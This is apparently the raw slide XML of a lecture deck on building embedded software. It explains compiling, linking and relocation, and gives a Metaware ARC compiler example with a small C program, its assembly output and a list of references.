        <p:nvGraphicFramePr>
          <p:cNvPr id="2050" name="Object 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="1981200"/>
          <a:ext cx="8005763" cy="4495800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s18462"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8005763"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34941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pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Building Embedded Software</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197635" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3607526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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The Build Process - overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1828800"/>
            <a:ext cx="8229600" cy="2840038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>An executable program is created from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>source files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>source files are compiled or assembled into an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>object file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>Multiple object files are linked together to a single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>relocatable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> object file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1" smtClean="0"/>
              <a:t>relocatable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t> file is assigned with physical memory addresses matched to the embedded system to create the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>executable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1026" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1447800" y="4572000"/>
          <a:ext cx="6096000" cy="1985963"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s3113" name="Visio" r:id="rId4" imgW="10042550" imgH="3274771" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="10042550" imgH="32747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572000"/>
                        <a:ext cx="609600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2303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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The Build Process - Compiling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>The firmware is written in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>compiled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>programming language (C, C++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Some parts can be written directly in the processor assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Each of the source files is compiled into an object file which contains the machine code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>actual processor instructions for the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Additional information to be used in later stages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2004122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smtClean="0"/>
              <a:t>References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Programming Embedded Systems: With C and GNU Development Tools, 2nd Edition [Illustrated]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Embedded Systems Architecture: A Comprehensive Guide for Engineers and Programmers (Embedded Technology)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Operating Systems: Design and Implementation, 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Edition</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.embedded.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Wikipedia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>The Build Process – Compiling (cont)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1600200"/>
            <a:ext cx="4876800" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metaware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> compiler for ARC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="933450" lvl="1" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create a file called ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>foo.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ with one function: main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="933450" lvl="1" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[Optional:] Translate the C file into an assembly file.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hcarc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="933450" lvl="1" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compile the assembly file into an object file</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hcarc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo.s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="1600200"/>
            <a:ext cx="3429000" cy="23082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main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var1;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var2;</a:t>
            </a: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var1 =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+ 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   var2 =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+ 3;</a:t>
            </a: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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (var1 + var2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6149" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="4953000"/>
            <a:ext cx="3429000" cy="132397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%r1,%r0,2</a:t>
            </a:r>
          </a:p>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%r0,%r0,3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>j.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	[%blink]</a:t>
            </a:r>
          </a:p>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%r0,%r0,%r1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6150" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="38862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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>foo.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6151" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6743700" y="62484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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>foo.s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40085932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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="228600"/>
            <a:ext cx="8153400" cy="63087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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	.file	"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo.c</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.option	%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg</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ident</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	"hc8.0.10 -a6 -core1 -O -behaved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo.c</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ident</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	"08302007.192511"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equ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	.CC_I,0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	.global	.CC_I</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seg</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text",text</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.L00TEXT:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	; --------------| main |--------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	.align	4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	.global  main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>main:</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cfa_bf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600"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%r1,%r0,2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"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%r0,%r0,3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"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j.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	[%blink]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1"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.LL01.5:</a:t>
            </a:r>
          </a:p>
          <a:p>
